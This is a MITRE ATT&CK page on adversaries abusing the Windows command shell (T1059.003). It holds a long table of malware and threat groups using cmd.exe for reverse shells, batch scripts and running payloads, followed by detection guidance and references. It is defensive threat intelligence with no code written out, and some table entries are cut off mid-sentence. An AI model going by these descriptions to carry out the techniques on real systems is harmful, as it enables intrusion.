Command and Scripting Interpreter: Windows Command Shell
Other sub-techniques of Command and Scripting Interpreter (7)
ID | Name |
---|---|
T1059.001 | PowerShell |
T1059.002 | AppleScript |
T1059.003 | Windows Command Shell |
T1059.004 | Unix Shell |
T1059.005 | Visual Basic |
T1059.006 | Python |
T1059.007 | JavaScript/JScript |
Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe
) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage cmd.exe
to execute various commands and payloads. Common uses include cmd.exe /c
to execute a single command, or abusing cmd.exe
interactively with input and output forwarded over a command and control channel.
Procedure Examples
Name | Description |
---|---|
4H RAT | |
ABK |
ABK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.[155] |
adbupd | |
admin@338 |
Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.[166] |
ADVSTORESHELL |
ADVSTORESHELL can create a remote shell and run a given command.[22][23] |
APT1 |
APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution.[53] |
APT18 |
APT18 uses cmd.exe to execute commands on the victim’s machine.[192][193] |
APT28 |
An APT28 loader Trojan uses a cmd.exe and batch script to run its payload.[189] The group has also used macros to execute payloads.[73][190][191] |
APT3 |
An APT3 downloader uses the Windows command |
APT32 | |
APT37 | |
APT38 |
APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.[188] |
APT39 |
APT39 utilized custom scripts to perform internal reconnaissance. [196] |
APT41 |
APT41 used |
Astaroth | |
AuditCred |
AuditCred can open a reverse shell on the system to execute commands.[50] |
BabyShark | |
BackConfig |
BackConfig can download and run batch files to execute commands on a compromised host.[157] |
BACKSPACE |
Adversaries can direct BACKSPACE to execute from the command line on infected hosts, or have BACKSPACE create a reverse shell.[29] |
BADNEWS |
BADNEWS is capable of executing commands via cmd.exe.[69][70] |
Bandook | |
Bankshot |
Bankshot uses the command-line interface to execute arbitrary commands.[51][52] |
BBK |
BBK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.[155] |
BISCUIT |
BISCUIT has a command to launch a command shell on the system.[74] |
Bisonal |
Bisonal can launch cmd.exe to execute commands on the system.[65] |
BLACKCOFFEE |
BLACKCOFFEE has the capability to create a reverse shell.[36] |
Blue Mockingbird |
Blue Mockingbird has used batch script files to automate execution and deployment of payloads.[219] |
BONDUPDATER |
BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe.[103] |
BRONZE BUTLER |
BRONZE BUTLER has used batch scripts and the command-line interface for execution.[80] |
CALENDAR |
CALENDAR has a command to run cmd.exe to execute commands.[74] |
Carbanak | |
Cardinal RAT |
Cardinal RAT can execute commands.[25] |
CARROTBAT |
CARROTBAT has the ability to execute command line arguments on a compromised host.[154] |
China Chopper |
China Chopper's server component is capable of opening a command terminal.[16][17][18] |
cmd |
cmd is used to execute programs and other actions at the command-line interface.[2] |
Cobalt Group |
Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.[205] The group has used an exploit toolkit known as Threadkit that launches .bat files.[206][207][208][205][209][210] |
Cobalt Strike |
Cobalt Strike uses a command-line interface to interact with systems.[1] |
Cobian RAT |
Cobian RAT can launch a remote command shell interface for executing commands.[81] |
CoinTicker |
CoinTicker executes a bash script to establish a reverse shell.[108] |
Comnie | |
ComRAT | |
CozyCar |
A module in CozyCar allows arbitrary commands to be executed by invoking |
Dark Caracal |
Dark Caracal has used macros in Word documents that would download a second stage if executed.[160] |
DarkComet |
DarkComet can launch a remote shell to execute commands on the victim’s machine.[132] |
Darkhotel |
Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.[187] |
Daserf | |
DealersChoice |
DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.[45] |
Denis |
Denis can launch a remote shell to execute arbitrary commands on the victim’s machine.[136][137] |
Dipsind | |
DownPaper | |
Dragonfly 2.0 |
Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts.[174][175] |
Emissary |
Emissary has the capability to create a remote shell and execute specified commands.[40] |
Emotet | |
Empire | |
EvilBunny |
EvilBunny has an integrated scripting engine to download and execute Lua scripts.[123] |
Exaramel for Windows |
Exaramel for Windows has a command to launch a remote shell and executes commands on the victim’s machine.[138] |
Felismus | |
FELIXROOT |
FELIXROOT executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.[94][93] |
FIN10 |
FIN10 has executed malicious .bat files containing PowerShell commands.[165] |
FIN7 |
FIN7 used the command prompt to launch commands on the victim’s machine.[204][118] |
FIN8 |
FIN8 has used a Batch file to automate frequently executed post compromise cleanup activities.[172] FIN8 executes commands remotely via cmd.exe.[173] |
Frankenstein |
Frankenstein has run a command script to set up persistence as a scheduled task named "WinUpdate", as well as other encoded commands from the command-line.[218] |
Gamaredon Group |
Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file.[13][180] |
Gold Dragon |
Gold Dragon uses cmd.exe to execute commands for discovery.[26] |
Goopy |
Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.[137] |
Gorgon Group |
Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.[164] |
GravityRAT |
GravityRAT executes commands remotely on the infected host.[12] |
GreyEnergy |
GreyEnergy uses cmd.exe to execute itself in-memory.[93] |
H1N1 | |
HARDRAIN | |
HAWKBALL |
HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.[119] |
hcdLoader |
hcdLoader provides command-line access to the compromised system.[61] |
Helminth |
Helminth can provide a remote shell. One version of Helminth uses batch scripting.[68] |
Hi-Zor | |
HiddenWasp |
HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution.[121] |
Hikit |
Hikit has the ability to create a remote shell and run given commands. [143] |
HOMEFRY | |
Honeybee |
Several commands are supported by the Honeybee's implant via the command-line interface and there’s also a utility to execute any custom command on an infected endpoint.[211] Honeybee used batch scripting.[211] |
HOPLIGHT |
HOPLIGHT can launch cmd.exe to execute commands on the system.[107] |
HotCroissant |
HotCroissant can remotely open applications on the infected host with the |
HTTPBrowser |
HTTPBrowser is capable of spawning a reverse shell on a victim.[66] |
httpclient |
httpclient opens cmd.exe on the victim.[28] |
InnaputRAT |
InnaputRAT launches a shell to execute commands on the victim’s machine.[47] |
InvisiMole |
InvisiMole can launch a remote shell to execute commands.[91] |
Ixeshe | |
JCry | |
JHUHUGIT | |
JPIN |
JPIN can use the command-line utility cacls.exe to change file permissions.[31] |
jRAT | |
Kasidet | |
Kazuar |
Kazuar uses cmd.exe to execute commands on the victim’s machine.[130] |
Ke3chang |
Ke3chang has used batch scripts in its malware to install persistence mechanisms.[181] |
KeyBoy |
KeyBoy can launch interactive shells for communicating with the victim machine.[115][116] |
KEYMARBLE | |
Koadic |
Koadic can open an interactive command-shell to perform command line functions on victim machines.[4] Koadic performs most of its operations using Windows Script Host (Jscript) and runs arbitrary shellcode .[4] |
KOMPROGO | |
KONNI |
KONNI has used cmd.exe execute arbitrary commands on the infected host across different stages of the infection change.[54][55] |
Lazarus Group |
Lazarus Group malware uses cmd.exe to execute commands on victims.[212][213][214][215] A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.[48] |
Leviathan |
Leviathan uses a backdoor known as BADFLICK that is is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML.[46].[89] |
LightNeuron |
LightNeuron is capable of executing commands via cmd.exe.[122] |
Linfo |
Linfo creates a backdoor through which remote attackers can start a remote shell.[8] |
LoudMiner |
LoudMiner used a batch script to run the Linux virtual machine as a service.[148] |
Magic Hound |
Magic Hound has used the command-line interface.[163] |
MAZE |
The MAZE encryption process has used batch scripts with various commands.[147] |
MechaFlounder |
MechaFlounder has the ability to run commands on a compromised host.[152] |
menuPass |
menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.[169][63][170][56] menuPass has used malicious macros embedded inside Office documents to execute files.[171][56] |
Metamorfo | |
Micropsia | |
MirageFox |
MirageFox has the capability to execute commands using cmd.exe.[100] |
Mis-Type |
Mis-Type uses cmd.exe to run commands for enumerating the host.[14] |
Misdat |
Misdat is capable of providing shell functionality to the attacker to execute commands.[14] |
Mivast |
Mivast has the capability to open a remote shell and run basic commands.[9] |
MoonWind |
MoonWind can execute commands via an interactive command shell.[135] MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.[135] |
More_eggs | |
Mosquito |
Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.[11] |
MuddyWater |
MuddyWater has used a custom tool for creating reverse shells.[182] MuddyWater has used JavaScript files to execute its POWERSTATS payload.[183][184][185][182][186] |
MURKYTOP | |
NanoCore |
NanoCore can open a remote command-line interface and execute commands.[97] NanoCore uses JavaScript files.[98] |
NavRAT |
NavRAT leverages cmd.exe to perform discovery techniques.[58] NavRAT loads malicious shellcode and executes it in memory.[58] |
NETEAGLE |
NETEAGLE allows adversaries to execute shell commands on the infected host.[29] |
Netwalker |
Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.[151] |
njRAT |
njRAT can launch a command shell interface for executing commands.[113] |
OceanSalt |
OceanSalt can create a reverse shell on the infected endpoint using cmd.exe.[32] OceanSalt has been executed via malicious macros.[32] |
OilRig |
OilRig has used macros to deliver malware such as QUADAGENT and OopsIE.[84][216][59][35][217] OilRig has used batch scripts.[84][216][59][35][217] |
Okrum |
Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.[142] |
OopsIE |
OopsIE uses the command prompt to execute commands on the victim's machine.[59][60] |
Orz |
Orz can execute shell commands.[46] Orz can execute commands with JavaScript.[46] |
Patchwork |
Patchwork ran a reverse shell with Meterpreter.[194] Patchwork used JavaScript code and .SCT files on victim machines.[70][195] |
PHOREAL | |
Pisloader |
Pisloader uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.[49] |
PLAINTEE |
PLAINTEE uses cmd.exe to execute commands on the victim’s machine.[95] |
PLEAD |
PLEAD has the ability to execute shell commands on the compromised host.[140] |
PlugX |
PlugX allows actors to spawn a reverse shell on a victim.[66][67] |
PoisonIvy |
PoisonIvy creates a backdoor through which remote attackers can open a command-line interface.[87] |
Pony |
Pony has used batch scripts to delete itself after execution.[150] |
PowerDuke |
PowerDuke runs |
POWRUNER | |
Proxysvc |
Proxysvc executes a binary on the system and logs the results into a temp file by using: |
Pteranodon |
Pteranodon can execute commands on the victim.[13] |
QUADAGENT |
QUADAGENT uses cmd.exe to execute scripts and commands on the victim’s machine.[35] |
QuasarRAT |
QuasarRAT can launch a remote shell to execute commands on the victim’s machine.[3] |
Ragnar Locker |
Ragnar Locker has used cmd.exe and batch scripts to execute commands.[159] |
Rancor | |
RATANKBA | |
RedLeaves |
RedLeaves can receive and execute commands with cmd.exe. It can also provide a reverse shell.[63][38] |
Remcos |
Remcos can launch a remote command line to execute commands on the victim’s machine.[5] |
Remexi |
Remexi silently executes received commands with cmd.exe.[106] |
Revenge RAT |
Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.[110] |
RGDoor |
RGDoor uses cmd.exe to execute commands on the victim’s machine.[75] |
Rising Sun |
Rising Sun executed commands using cmd.exe.[145] |
RobbinHood |
RobbinHood uses cmd.exe on the victim's computer.[124] |
RogueRobin |
RogueRobin uses Windows Script Components.[43][44] |
RTM | |
RunningRAT |
RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.[26] |
Ryuk |
Ryuk has used |
Sakula |
Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. Sakula also has the capability to invoke a reverse shell.[24] |
SamSam |
SamSam uses custom batch scripts to execute some of its components.[105] |
SDBot |
SDBot has the ability to use the command shell to execute commands on a compromised host.[153] |
SeaDuke | |
Seasalt |
Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.[74] |
SEASHARPEE |
SEASHARPEE can execute commands on victims.[21] |
ServHelper |
ServHelper can execute shell commands against cmd.[111][112] |
ShimRat |
ShimRat can be issued a command shell function from the C2.[146] |
Silence |
Silence has used Windows command-line to run commands.[197][198][199] |
SNUGRIDE |
SNUGRIDE is capable of executing commands and spawning a reverse shell.[38] |
Soft Cell |
Soft Cell used the Windows command shell to execute commands.[202] |
Sowbug | |
SQLRat |
SQLRat has used SQL to execute JavaScript and VB scripts on the host system.[118] |
StreamEx | |
Suckfly |
Several tools used by Suckfly have been command-line driven.[179] |
SYSCON |
SYSCON has the ability to execute commands through cmd on a compromised host.[154] |
TA505 | |
TDTESS | |
TEXTMATE |
TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.[33][34] |
Threat Group-1314 |
Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.[176] |
Threat Group-3390 |
Threat Group-3390 has used command-line interfaces for execution.[16][178] |
TinyZBot | |
TrickBot |
TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.[104] |
Tropic Trooper |
Tropic Trooper has used Windows command scripts.[149] |
TSCookie |
TSCookie has the ability to execute shell commands on the infected host.[141] |
Turla |
Turla RPC backdoors have used cmd.exe to execute commands.[200][201] |
TURNEDUP | |
TYPEFRAME |
TYPEFRAME can uninstall malware components using a batch script.[134] TYPEFRAME can execute commands using a shell.[134] |
UBoatRAT | |
Umbreon |
Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet[85] |
UPPERCUT |
UPPERCUT uses cmd.exe to execute commands on the victim’s machine.[56] |
USBferry | |
Volgmer |
Volgmer can execute commands on the victim's machine.[41][42] |
WEBC2 | |
Wiarp |
Wiarp creates a backdoor through which remote attackers can open a command line interface.[92] |
XTunnel | |
Zebrocy |
Zebrocy uses cmd.exe to execute commands on the system.[120] |
Zeus Panda |
Zeus Panda can launch an interface where it can execute several commands on the victim’s PC.[88] |
ZLib | |
zwShell | |
ZxShell |
Mitigations
Mitigation | Description |
---|---|
Execution Prevention |
Use application control where appropriate. |
Detection
Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
References
- Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.
- Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.
- MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.
- Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
- Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.
- Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
- F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
- Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.
- Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.
- Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
- ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
- Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.
- Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
- US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.
- Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.
- Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
- The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
- Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.
- Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.
- Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
- ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
- Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
- Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
- Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
- Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
- Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
- FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
- ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
- Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
- Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.
- Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
- Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.
- Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
- FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.
- Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.
- FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
- Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.
- Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
- US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
- US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
- Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.
- Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.
- Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
- Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
- ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.
- Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.
- Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.
- Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.
- Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
- US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.
- Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
- Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
- Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.
- Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
- Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
- Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.
- Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
- Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
- Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.
- Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
- PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
- US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
- Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
- Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
- Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
- Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
- Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
- Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
- Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
- Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
- Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
- Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
- Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
- Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
- ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
- Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.
- Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
- Yadav, A., et al. (2017, August 31). Cobian RAT – A backdoored RAT. Retrieved November 13, 2018.
- Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
- McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.
- Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
- Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.
- Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
- Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
- Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.
- FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
- Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.
- Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
- Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.
- Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
- Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
- Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
- Galperin, E., Et al.. (2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.
- Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.
- Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018.
- O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
- Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018.
- Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.
- Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
- Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.
- Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.
- Palotay, D. and Mackenzie, P. (2018, April). SamSam Ransomware Chooses Its Targets Carefully. Retrieved April 15, 2019.
- Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.
- US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
- Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.
- Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.
- Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.
- Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
- Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
- Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.
- Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
- Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
- Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
- Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.
- Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.
- Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.
- ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
- Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.
- Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.
- Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
- Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.
